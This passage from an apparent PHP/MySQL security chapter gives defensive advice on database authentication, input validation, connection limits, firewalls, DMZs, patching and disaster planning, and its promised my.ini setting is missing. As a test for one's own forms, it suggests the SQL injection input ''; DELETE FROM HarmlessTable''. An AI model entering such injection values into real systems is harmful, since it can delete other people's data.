Image  Connect without specifying a username and password.

Image  Connect as root without specifying a password.

Image  Give an incorrect password for root.

Image  Connect as a user and try to access a table for which the user should not have permission.

Image  Connect as a user and try to access system databases or permissions tables.

Until you have tried each of these, you cannot be sure that your system’s authentication system is adequately protected.

Sending Data to the Server

As we have said repeatedly throughout this book (and will continue to do so), never send unfiltered data to the server. By using the various functions provided by the database extensions to escape strings (such as mysqli_real_escape_string or mssql_escape_string), we give ourselves a basic level of protection.

However, as we have seen elsewhere, we should do more than just rely on this function, and do data type checking for each field from an input form. If we have a username field, we probably want to be sure that it doesn’t contain kilobytes of data as well as characters we do not want to see in user names. By doing this validation in code, we can provide better error messages and can reduce some of the security risk to our databases. Similarly, for numeric and date/time data, we can verify the relative sanity of values before passing them to the server.

Finally, we can use prepared statements on those servers where it is available, which will do much of the escaping for us and make sure that everything is in quotes where necessary.

Again, there are tests we can do to make sure that our database is handling our data correctly:

Image  Try entering values in forms such as '; DELETE FROM HarmlessTable', and so on.

Image  For fields such as numbers or dates, try entering garbage values such as '55#$888ABC' and make sure that you get an error back.

Image  Try to enter data that is beyond whatever size limits you have specified and verify that an error occurs.

Connecting to the Server

There are a few ways we can keep our database servers secure by controlling connections to them. One of the easiest is to restrict from where people are allowed to connect. Many of the permissions systems used in the various database management systems allow you to specify not only a username and password for a user, but also from which machines they are allowed to connect. If the database server and web server/PHP engine are on the same machine, it most certainly makes sense to allow only connections from ‘localhost’, or the IP address used by that machine. If our web server is always on one computer, there is absolutely nothing wrong with allowing users to connect to the database only from that machine.

Many database servers are incorporating into their features the capability to connect to them via encrypted connections (usually using a protocol known as Secure Sockets Layer, or SSL). If you ever have to connect with a database server over the open Internet, you absolutely want to use an encrypted connection if available. If not, consider using a product that does tunneling, a fiendishly clever idea in which a secure connection is made from one machine to another, and TCP/IP ports (such as port 80 for HTTP or 25 for SMTP) are routed over this secure connection to the other computer, which sees the traffic as local.

Finally, you should be sure that the number of connections that the database server is configured to handle at any given time is greater than or exceeds the number of connections that the web server and PHP are going to be able to spawn. We mentioned previously that the 1.3.x series of Apache HTTP Server releases default to being able to launch up to 150 servers. With the default number of connections allowed in my.ini for MySQL set to 100, we already have a mismatched configuration.

To fix this we should definitely make the following modification in our my.ini file:


We have allocated one extra because MySQL always saves one of the connections for the root user. That way, even when the server is fully loaded, the super user can log in and take action.

Running the Server

When running the database server, we can take a number of actions to help keep it safe. First and foremost, we should never run it as the super user (root on UNIX, administrator on Windows). If the server were to ever become compromised, our entire system would be in jeopardy. In fact, MySQL refuses to run as the super user unless you force it to (which, again, is discouraged).

After you have set up the database software, most programs will then have you go and change the ownership and permissions on the database directories and files to keep them away from prying eyes. Make sure that this is done, and that the database files are not still owned by the super user (in which case the nonsuper-user database server process might not even be able to write to its own database files).

Finally, when working with the permissions and authentication system, create users with the absolute minimum set of permissions. Instead of creating users with a broad set because “they might need that some day,” create them with the least number possible, and add permissions only when they are absolutely needed.

Protecting the Network

There are a few ways in which we can protect the network in which our web application resides. Although the exact details of these are beyond the scope of this book, they are reasonably easy to learn about and will protect more than just your web applications.

Install Firewalls

Just as we need to filter all the input that comes into our web application written in PHP, we also need to filter all the traffic that comes at our network, whether it be into our corporate offices or a data center in which we are hosting our servers and applications.

You do this via a firewall, which can be software running on a known operating system such as FreeBSD, Linux, or Microsoft Windows, or it can be a dedicated appliance you purchase from a networking equipment vendor. A firewall’s job is to filter out unwanted traffic and block access to those parts of our network that we want left alone.

The TCP/IP protocol, on which the Internet is based, operates on ports, with different ports being dedicated to different types of traffic (for example, HTTP is port 80). A large number of ports are used strictly for internal network traffic and have little use for interaction with the outside world. If we prohibit traffic from entering or leaving our network on these ports, we reduce the risk that our computers or servers (and therefore our web applications) will be compromised.

Use a DMZ

As we mentioned earlier in this chapter, our servers and web applications are not only at risk of attack from external customers, but also from internal malicious users. Although these latter attackers will be fewer and farther between, they often have the potential to do more damage via having intimate knowledge of how the company works.

One of the ways to mitigate this risk is to implement what is known as a demilitarized zone, or DMZ. In this, we isolate the servers running our web applications (and other servers, such as corporate email servers) from both the external Internet and the internal corporate networks, as shown in Figure 16.3.

Figure 16.3  Setting up a demilitarized zone (DMZ).


DMZs have two major advantages:

Image  They protect our servers and web applications from internal attacks as well as external attacks.

Image  They protect our internal networks even further by putting more layers of firewalls and security between our corporate network and the Internet.

The design, installation, and maintenance of a DMZ is something that should be coordinated with the network administrators for the location where you will be hosting your web application.

Prepare for DoS and DDoS Attacks

One of the more frightening attacks seen today is the denial of service (DoS) attack, which we mentioned in Chapter 15. Network DOS attacks and the even more alarming distributed denial of service (DDoS) attacks use hijacked computers, worms, or other devices to exploit weaknesses in software installations, or even those inherent within the design of protocols such as TCP/IP themselves to swamp a computer and prevent it from replying to any connection requests from legitimate clients.

Unfortunately, this type of attack is very difficult to prevent and respond to. Some network appliance vendors sell equipment to help mitigate the risks and effects of DoS attacks, but there are no comprehensive solutions against them yet.

Your network administrator, at the very least, should do some research to understand the nature of the problem and the risks that your particular network and installations face. This, in combination with discussions with your ISP (or whomever will be hosting the machines running your ISP) will help prepare you for the eventuality when such an attack does occur. Even if the attack is not directed specifically at your servers, they may end up being victims nonetheless.

Computer and Operating System Security

The last thing we will worry about protecting is the server computer on which the web application runs. There are a few key ways in which you can and should do this.

Keep the Operating System Up-to-Date

One of the easier ways to keep your computer safe is to keep the operating system software up-to-date as much as possible. As soon as you choose a particular operating system for your production environment, you should set into motion a plan for performing upgrades and applying security patches to that operating system. You should also have somebody periodically go and check certain sources looking for new alerts, patches, or updates.

Where exactly you find out about vulnerabilities depends exactly on the operating system software you are using. Typically, this can be done from the vendor from which you purchase the operating system, especially in the case of Microsoft Windows, Red Hat or SuSE Linux, or Sun Microsystem’s Solaris Operating System. For other operating systems, such as FreeBSD, Ubuntu Linux, or OpenBSD, you typically go to the website representing their organized communities and see what latest security fixes they are recommending.

Like all software updates, you should have a staging environment in which you can test the application of these patches and verify their successful installation before performing the operation on any production servers. This lets you verify that nothing has broken in your web application before the problem gets to your live servers.

Being smart with the operating system and security fixes is definitely worth your while: If there is a security fix in the FireWire subsystem of a particular operating system, and your server has no FireWire hardware anywhere inside, it is probably a waste of time to go through the whole deployment process for that fix.

Run Only What Is Necessary

One of the problems many servers have is that they come with large amounts of software running, such as mail servers, FTP servers, the capability to work with Microsoft file system shares (via the SMB protocol), and others. To run our web applications, we need the web server software (such as IIS or Apache HTTP Server), PHP and any related libraries, the database server software, and often not much else.

If you are not using any of those other pieces of software, shut them off and disable them for good. That way, you do not have to worry about them being safe. Users of Microsoft Windows 2000 and XP operating systems should definitely run through the list of the services that their server is running and shut off those that are not needed. If in doubt, do some research—it is highly likely that somebody on the Internet has already asked (and received an answer to) what a particular service does and whether it is necessary.

Physically Secure the Server

We mentioned previously that one of our security threats is somebody coming into our building, unplugging the server computer, and simply walking off with it. This is, tragically, not a joke. With the average server not being a terribly cheap piece of hardware, the motivations for stealing server computers are not limited to corporate espionage and intellectual theft. Some people might just want to steal the computer for resale.

Thus, it is critical that servers used to run your web applications are kept in a secure environment, with only authorized people given access to it and specific processes in place for granting and revoking access to different people.

Disaster Planning

If you ever want to see a truly blank look, ask your average IT manager what would happen to their servers, or indeed their entire data center, if the building in which it was hosted burned down or was instantly destroyed in a massive earthquake. An alarming percentage of them will have no answer at all.

Disaster (recovery) planning is a critical and frequently overlooked part of running a service, whether it is a web application or anything else (including the day-to-day operations of your business). It is usually a collection of documents or procedures that have been rehearsed for dealing with the questions that arise when one of the following happens (among many):

Image  Parts of or our entire data center is destroyed in some catastrophic event.

Image  Our development team goes out for lunch and all are hit by a bus and seriously injured (or killed).

Image  Our corporate headquarters burns down.

Image  A network attacker or disgruntled employee manages to destroy all the data on the servers for our web applications.

Although many people do not like to even talk about disasters and attacks for various reasons, the hard reality is that such things actually do occur—fortunately, only rarely. Businesses, however, usually cannot afford the downtime that an event of such magnitude would cause if they were completely unprepared. A business that does millions of dollars a day in business would be devastated if its web applications were shut down for over a week while people not 100% familiar with the setup worked to get the systems up and running again.

By preparing for these events, anticipating them with clear plans of action, and by rehearsing some of the more critical portions of these, a little financial investment up front can save the business from potentially disastrous losses later on when a real problem does strike.

Some of the things we might do to help with disaster planning and recovery include the following:

Image  Make sure that all data is backed up daily and taken off-site to another facility, so that even if our data center is destroyed, we still have the data elsewhere.

Image  Have handwritten scripts, also off-site, on how to re-create the server environments and set up the web application. Rehearse this re-creation at least once.

Image  Have a full copy of all source code necessary for our web application, also in multiple locations.

Image  For larger teams, prohibit all members of the team from traveling in one vehicle, such as a car or airplane, so that if there is an accident, we will be affected less.

Image  Have automated tools running to make sure that server operation is normal, and have a designated “emergency operator” who will be responsible for coming in during nonbusiness hours when a problem arises.

Image  Make arrangements with a hardware provider to have new hardware immediately available in the case that your data center is destroyed. It would be most frustrating to have to wait 4 to 6 weeks for new servers.


In Chapter 17, “Implementing Authentication with PHP and MySQL,” we move beyond security to take a closer look at authentication—allowing users to prove their identity. We look at a few different methods, including using PHP and MySQL to authenticate site visitors.

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